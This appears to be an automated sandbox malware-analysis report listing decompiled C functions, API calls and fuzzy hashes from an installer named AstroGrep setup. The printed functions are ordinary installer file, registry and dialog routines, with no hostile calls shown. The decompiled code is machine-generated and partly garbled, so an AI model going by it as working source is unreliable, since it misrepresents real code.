Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: CallbackDispatcherShowUserWindow
• String ID:
• API String ID: 82835404-0
• Opcode ID: 631860118f17632e048306a62bf20ea73867afe44b58029fb558df6f2f837031
• Instruction ID: c8fe5530bc3a284fb496cf405a900608927f238f86a8d8635fe2229634aa8b82
• Opcode Fuzzy Hash: 631860118f17632e048306a62bf20ea73867afe44b58029fb558df6f2f837031
• Instruction Fuzzy Hash: C0E08C32A041009BEB20FBB5AA488AE33659B50369B204437E102F25D1C6B89C429E3A
Uniqueness Score: -1.00%

C-Code - Quality: 68%
E004059A2(CHAR* _a4, long _a8, long _a12) {
    signed int _t5;
    void* _t6;

    _t5 = GetFileAttributesA(_a4); // executed
    asm("sbb ecx, ecx");
    _t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
    return _t6;
}

Instruction addresses: 0x004059a6, 0x004059b3, 0x004059c8, 0x004059ce

APIs
• GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 004059A6
• CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
• Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
• Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
• Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040597D(CHAR* _a4) {
    signed char _t3;
    signed char _t7;

    _t3 = GetFileAttributesA(_a4); // executed
    _t7 = _t3;
    if(_t7 != 0xffffffff) {
        SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
    }
    return _t7;
}

Instruction addresses: 0x00405982, 0x00405988, 0x0040598d, 0x00405996, 0x00405996, 0x0040599f

APIs
• GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
• SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405996
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
• Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
• Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
• Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004035D5() {
    void* _t1;
    void* _t3;
    signed int _t6;

    _t1 =  *0x409018; // 0xffffffff
    if(_t1 != 0xffffffff) {
        CloseHandle(_t1);
         *0x409018 =  *0x409018 | 0xffffffff;
        _t6 =  *0x409018;
    }
    E0040361A();
    _t3 = E004055D1(_t6, "C:\\Users\\hardz\\AppData\\Local\\Temp\\nsq211B.tmp\\", 7); // executed
    return _t3;
}

Instruction addresses: 0x004035d5, 0x004035dd, 0x004035e0, 0x004035e6, 0x004035e6, 0x004035e6, 0x004035ed, 0x004035f9, 0x004035fe

APIs
• CloseHandle.KERNEL32(FFFFFFFF,0040340C,?), ref: 004035E0
Strings
• C:\Users\user\AppData\Local\Temp\nsq211B.tmp\, xrefs: 004035F4
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: CloseHandle
• String ID: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\
• API String ID: 2962429428-3865883443
• Opcode ID: b4e71e5da018f29a942a103bdf59fc510cec2df476782853edbd034567b71d58
• Instruction ID: 0f8781e1bbdd9c2adc6ca0ac5482970d0aa05edb5ea4ec715affa2ba15943bce
• Opcode Fuzzy Hash: b4e71e5da018f29a942a103bdf59fc510cec2df476782853edbd034567b71d58
• Instruction Fuzzy Hash: 58C01230504A00B7C1386F789D4A9053A546740336BE44765B4B5B15F2C73C5A85956D
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040548B(CHAR* _a4) {
    int _t2;

    _t2 = CreateDirectoryA(_a4, 0); // executed
    if(_t2 == 0) {
        return GetLastError();
    }
    return 0;
}

Instruction addresses: 0x00405491, 0x00405499, 0x00000000, 0x0040549f, 0x00000000

APIs
• CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
• GetLastError.KERNEL32 ref: 0040549F
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
• Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
• Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
• Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 41%
                                                                                                            			E0040265E(char __ebx, char* __esi) {
                                                                                                            				void* _t5;
                                                                                                            				int _t8;
                                                                                                            				char _t11;
                                                                                                            				void* _t13;
                                                                                                            				void* _t15;
                                                                                                            				void* _t19;
                                                                                                            
                                                                                                            				_t17 = __esi;
                                                                                                            				_t11 = __ebx;
                                                                                                            				_t5 = E00405CA6(_t13, _t15);
                                                                                                            				if(_t5 == __ebx) {
                                                                                                            					L2:
                                                                                                            					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                                            					 *_t17 = _t11;
                                                                                                            				} else {
                                                                                                            					_t8 = FindNextFileA(_t5, _t19 - 0x1a4); // executed
                                                                                                            					if(_t8 != 0) {
                                                                                                            						_push(_t19 - 0x178);
                                                                                                            						_push(__esi);
                                                                                                            						E00405D2F();
                                                                                                            					} else {
                                                                                                            						goto L2;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t19 - 4));
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • FindNextFileA.KERNELBASE(00000000,?), ref: 00402670
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: FileFindNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2029273394-0
                                                                                                            • Opcode ID: aeb2cb0fec585eae4c491a65588537bed9944789986222d2921ea485206fe541
                                                                                                            • Instruction ID: 40327f167f56cc920aeb651fb5f2ad05af9efb3577a6d189e0bd99497a83f7e5
                                                                                                            • Opcode Fuzzy Hash: aeb2cb0fec585eae4c491a65588537bed9944789986222d2921ea485206fe541
                                                                                                            • Instruction Fuzzy Hash: 3AE0E5326041008BF710EBA1DD48AAE73A8DF10304F20447BD201E21C0E2B94985AB3A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 44%
                                                                                                            			E00402616(void* __eflags) {
                                                                                                            				long _t6;
                                                                                                            				long _t8;
                                                                                                            				LONG* _t10;
                                                                                                            				void* _t12;
                                                                                                            				void* _t15;
                                                                                                            				void* _t17;
                                                                                                            
                                                                                                            				_push(ds);
                                                                                                            				if(__eflags != 0) {
                                                                                                            					_t6 = E00402A1D(2);
                                                                                                            					_t8 = SetFilePointer(E00405CA6(_t12, _t15), _t6, _t10,  *(_t17 - 0x1c)); // executed
                                                                                                            					if( *((intOrPtr*)(_t17 - 0x24)) >= _t10) {
                                                                                                            						_push(_t8);
                                                                                                            						E00405C8D();
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t17 - 4));
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630
                                                                                                              • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: FilePointerwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 327478801-0
                                                                                                            • Opcode ID: 764acf2aeb277f9e06bdeffef5fa042cff7d54f69f19df9b32342fbbe382f709
                                                                                                            • Instruction ID: a9483199a9c1f24fdd03f346660dbac79c1e67f8a05fdc412783a5a7fba403a9
                                                                                                            • Opcode Fuzzy Hash: 764acf2aeb277f9e06bdeffef5fa042cff7d54f69f19df9b32342fbbe382f709
                                                                                                            • Instruction Fuzzy Hash: BCE04F76A04100ABF701FBA6AE49DBF776ADB50318B60453BF601F10C1D67D89069A3E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00402B44(void* __eflags, void* _a4) {
                                                                                                            				char* _t8;
                                                                                                            				intOrPtr _t9;
                                                                                                            				signed int _t11;
                                                                                                            
                                                                                                            				_t8 = E00402A3A(0x22);
                                                                                                            				_t9 =  *0x40a810; // 0x19f56c
                                                                                                            				_t11 = RegOpenKeyExA(E00402B2F( *((intOrPtr*)(_t9 + 4))), _t8, 0,  *0x42e4b0 | _a4,  &_a4); // executed
                                                                                                            				asm("sbb eax, eax");
                                                                                                            				return  !( ~_t11) & _a4;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                            • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                                                            • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                            • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405A49(void* _a4, void* _a8, long _a12) {
                                                                                                            				int _t7;
                                                                                                            				long _t11;
                                                                                                            
                                                                                                            				_t11 = _a12;
                                                                                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                            • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                                                                            • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                            • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405A1A(void* _a4, void* _a8, long _a12) {
                                                                                                            				int _t7;
                                                                                                            				long _t11;
                                                                                                            
                                                                                                            				_t11 = _a12;
                                                                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                            • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                                                                            • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                            • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00402644(void* __ebx) {
				void* _t2;
				void* _t8;
				void* _t10;
				void* _t12;

				_t2 = E00405CA6(_t8, _t10);
				if(_t2 != __ebx) {
					FindClose(_t2); // executed
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t12 - 4));
				return 0;
			}
Instruction addresses: 0x00402645, 0x0040264c, 0x00402653, 0x00402653, 0x004028d2, 0x004028de
APIs
• FindClose.KERNELBASE(00000000), ref: 00402653
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: c1afc8ea0f91f816f2234f0e4a55c183c0d46910afa635dadd93745b14171a77
• Instruction ID: 32766ff02233f0426bc7bdd87c226e3691ef929e115130d2ed5f0bac09877e7f
• Opcode Fuzzy Hash: c1afc8ea0f91f816f2234f0e4a55c183c0d46910afa635dadd93745b14171a77
• Instruction Fuzzy Hash: DCD01277B1810087E711FBA9AD8884E73A5DA513197308837D201F61C4D37CC94A567D
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00403F14(intOrPtr _a12) {
				intOrPtr _v0;
				struct HWND__* _v4;
				int _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_t7 = SetDlgItemTextA(_v4, _v0 + 0x3e8, E00405D51(_t8, _t9, _t10, 0, _a12)); // executed
				return _t7;
			}
Instruction addresses: 0x00403f2e, 0x00403f33
APIs
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: ItemText
• String ID:
• API String ID: 3367045223-0
• Opcode ID: 8aa622d62f3612e386cdd8105f3b6da4d9bec96a62dcb677111357ff110a6e3b
• Instruction ID: cbe768feb37b9e58959a63a18694cb062dc1df2e3d0fb8c696893596ad792950
• Opcode Fuzzy Hash: 8aa622d62f3612e386cdd8105f3b6da4d9bec96a62dcb677111357ff110a6e3b
• Instruction Fuzzy Hash: 9FC04C75148600BFDA42AB95CC42F1FB799EF94715F00C92EB19CA51E1CA35C420DA26
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00403F60(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x42dbd8; // 0x8003a
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}
Instruction addresses: 0x00403f60, 0x00403f67, 0x00403f72, 0x00000000, 0x00403f72, 0x00403f78
APIs
• SendMessageA.USER32(0008003A,00000000,00000000,00000000), ref: 00403F72
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
• Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
• Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
• Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00403F49(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x42e408, 0x28, _a4, 1); // executed
				return _t2;
			}
Instruction addresses: 0x00403f57, 0x00403f5d
APIs
• SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
• Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
• Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
• Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00405509(int _a4, CHAR* _a8) {
				int _t3;

				_t3 = GetDlgItemTextA( *0x42dbd8, _a4, _a8, 0x400); // executed
				return _t3;
			}
Instruction addresses: 0x0040551c, 0x00405522
APIs
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: ItemText
• String ID:
• API String ID: 3367045223-0
• Opcode ID: 318c761e7d03a4792b39f91a0403b49a68554c31ad0ac7f657822979c07e75a0
• Instruction ID: 5bc079f376c4397dc27e91e65bfdd94062f5f07280b0cdba8df2e4a8c8164f3b
• Opcode Fuzzy Hash: 318c761e7d03a4792b39f91a0403b49a68554c31ad0ac7f657822979c07e75a0
• Instruction Fuzzy Hash: 13B0927A908200BFCE025B40DD04E0ABF62BB98711F21C424F395640B086726022EB0A
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E004030C7(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
				return _t2;
			}
Instruction addresses: 0x004030d5, 0x004030db
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
• Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
• Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
• Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00403F36(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x429864, _a4); // executed
				return _t2;
			}
Instruction addresses: 0x00403f40, 0x00403f46
APIs
• KiUserCallbackDispatcher.NTDLL(?,00403D13), ref: 00403F40
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
• Instruction ID: 0d109c2b2df33cddb2fdb4737f0edb640fcb727031da007fe45ed195bb05a301
• Opcode Fuzzy Hash: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
